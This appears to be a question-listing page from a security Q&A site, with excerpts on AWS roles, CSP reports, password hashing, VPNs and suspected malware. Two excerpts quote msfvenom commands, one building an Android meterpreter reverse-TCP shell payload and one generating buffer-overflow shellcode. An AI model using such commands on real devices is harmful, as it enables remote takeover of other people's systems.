Newest Questions
70,166 questions
0
votes
0
answers
40
views
hypothetical copy/paste code exploit from stackexchange or llm code copy blocks [closed]
is it possible to insert hidden code using utf8 or utf16 that rearranges a sequence of executable ascii letters (first a utf16 character that rearranges the letters off-screen could be interpreted as ...
0
votes
0
answers
24
views
How to properly assume an AWS IAM Role in an automated way from server sitting outside of cloud?
To securely access AWS Services, I get it that you should always use IAM Roles, such that the credential exposure is always only temporary. What I do not fully understand is, how do you actually ...
1
vote
0
answers
28
views
Android msfvenom payload [closed]
I have a Samsung S24 and I tried to install msfvenom from Kali Linux, but I always get an error.
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.66 LPORT=555 --platform android -a dalvik -...
0
votes
1
answer
45
views
MsfVenom generated shellcode fails when using it in buffer overflow
I use msfvenom generated shellcode in buffer overflow.
Here's command that i used to create shellcode for linux x64:
msfvenom -p linux/x64/exec -f py -o shellcode.py -b '\x00' CMD=whoami
and here's ...
0
votes
1
answer
40
views
How to find out if CSP report is XSS vulnerability or malicious browser extension?
I have recently added CSP headers to a rather complex web application, being -report-only at first.
I got some noise from browser extensions in the report, but two incidents caught my eye especially:
...
1
vote
0
answers
30
views
Can a SIM card have malware and how can it spread? [duplicate]
I think that my SIM card has malware and I want to transfer it to my other phone. Would the malware transfer also?
I saw that it can attack during a phone update download. If the update has downloaded ...
1
vote
0
answers
71
views
GPU speedup for PBKDF2 vs bcrypt vs Argon2
I've got a service currently using PBKDF2-HMAC-SHA256 for password hashing, and I thought I'd upgrade that to something a wee bit more GPU-resistant, so I've been checking out my options, comparing ...
1
vote
0
answers
77
views
VPN client on a router versus VPN client on a computer
Until now, I have been using VPN client on my computer. I did this to hide the fact that I was using Tor, as well as other activities, from my ISP. I would like to change my configuration. I want to ...
0
votes
0
answers
57
views
Wikipedia certificate unexpectedly from Google [closed]
Wikipedia's CAs are Let's Encrypt, DigiCert and GlobalSign. But my browser shows a certificate issued by... Google? (See the screenshot) What can this possibly mean?
I know there are some similar ...
0
votes
0
answers
13
views
What is this path added by /etc/paths.d/10-pmk-global on macOS? [migrated]
I was upgrading my development setup, and I found this path in my PATH variable: /opt/pmk/env/global/bin, and it's added by /etc/paths.d/10-pmk-global.
Usually, a system-related program would go in /...
0
votes
0
answers
24
views
How secure is the package lm-sensors? [closed]
I want to know how much secure is the package lm-sensors.
I need to monitor the temperature of my machine to adapt the configuration of the fans.
The programm prompt me for my root password to access ...
0
votes
0
answers
25
views
Seeking Advice on Transitioning to a Cybersecurity Career after 3 Years as a Full-Stack Developer [closed]
i wanna your advice for
cyberSecurity career i've been 3 years experience as fullstack developer
and i thing i gave some love to all things realated with DevOps and linux an cyberSecurity , so i ...
0
votes
0
answers
24
views
Insights required on my naive aproach to audit Firefox extensions [closed]
I tried to search the web on existing projects, but after failed attempts, I decided to code something on my own way, one approach, open to comments and improvements:
#!/usr/bin/env python3
import ...
0
votes
0
answers
34
views
Possible web form injection from ad triggering biometric prompt
This morning, I was reading an article on a popular local news site on my Android phone. After being on the page for about a minute, the fingerprint prompt showed up on my screen. The text said it was ...
0
votes
1
answer
91
views
Is C#'s System.Web.Helpers.Crypto password-hashing still considered secure?
I've been provisionally using C#'s System.Web.Helpers.Crypto.HashPassword() and .VerifyHashedPassword() in an (in-development) accounting/finance web app. Before the app's published, I'd like to ...